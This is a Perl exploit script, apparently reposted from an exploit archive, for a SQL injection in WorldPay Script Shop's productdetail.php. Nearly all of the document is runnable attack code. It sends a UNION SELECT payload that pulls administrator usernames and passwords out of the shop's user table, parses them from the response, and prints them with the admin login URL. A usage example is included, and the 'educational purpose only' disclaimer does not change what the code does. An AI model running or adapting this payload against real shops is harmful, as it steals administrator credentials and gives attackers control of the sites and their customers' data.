WorldPay Script Shop remote SQL injection exploit.
8e45c5bef71d3386da532d934d7881e71123fbc6f12cac1ce8974aec13afa848#!usr/bin/perl
###########################################################################
# Exploit Title: WorldPay Script Shop (productdetail) SQL Injection Exploit
# Date: 01-04-2010
# Author: darkmasking
###########################################################################
# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
###########################################################################
# Vuln discovered by Err0R
# WorldPay Script Shop (productdetail) SQL Injection Vulnerability
# http://www.exploit-db.com/exploits/10976
###########################################################################
# Greetz : sorry bro lom ada teman jadi tuk diri sendiri aja 0_o
###########################################################################
use IO::Socket::INET;
use LWP::UserAgent;
sub banner {
print "\n".
"[»]=============================================[_][-][X]\n".
"[»] ======= ------d-------m------ ==== ==== [»]\n".
"[»] || === = | |(o o)| | ||== || ==|| [»]\n".
"[»] || === = ||(~)|| || = = || [»]\n".
"[»] ======= | || || [»]\n".
"[»]---------------------------------------------------[»]\n".
"[»] WorldPay Script Shop (productdetail) [»]\n".
"[»] SQL Injection Exploit [»]\n".
"[»] by darkmasking [»]\n".
"[»] Vuln discovered by Err0R [»]\n".
"[»]===================================================[»]\n\n";
}
my $host = $ARGV[0];
my $sql_path = "/productdetail.php?id=";
my $admin_path ="/login.php";
if (@ARGV < 1) {
&banner();
&help("-1");
}
elsif(check($host) == 1) {
&banner();
&dmploit($host,$sql_path);
}
else {
&banner();
help("-2");
}
sub dmploit() {
my $host = $_[0];
my $sql_path = $_[1];
print "[+] Getting Username and Password\n";
print "[!] Checking...\n";
print "\n";
my $sql_atk = $host.$sql_path."-9999 union select null,null,null,concat(0x6461726b6d61736b696e67,0x3a,userName,0x3a,password,0x3a,0x6461726b6d61736b696e67),null from watch2td_db.tbl_users--";
my $sql_get = get_url($sql_atk);
my $connect = tag($sql_get);
if($connect =~ /darkmasking:(.+):(.+):darkmasking/) {
print "-o0 SQL Injection Successfully 0o-\n";
print "[+] Username : $1\n";
print "[+] Password : $2\n";
print "\n";
print "[+] Admin URL = $host$admin_path\n";
}
else {
print "[-] SQL Injection Failed\n";
}
}
sub get_url() {
$link = $_[0];
my $req = HTTP::Request->new(GET => $link);
my $ua = LWP::UserAgent->new();
$ua->timeout(5);
my $response = $ua->request($req);
return $response->content;
}
sub tag() {
my $string = $_[0];
$string =~ s/ /\$/g;
$string =~ s/\s/\*/g;
return($string);
}
sub check() {
my $host = $_[0];
if ($host =~ /http:\/\/(.*)/) {
return 1;
}
else {
return 0;
}
}
sub help() {
my $error = $_[0];
if ($error == -1) {
print "\n[-] Error, missed some arguments !\n\n";
}
elsif ($error == -2) {
print "\n[-] Error, Bad arguments !\n";
}
print " Usage : perl $0 http://www.darkurl.com/\n\n";
print " Ex : perl $0 http://www.darkurl.com/\n\n";
exit(0);
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed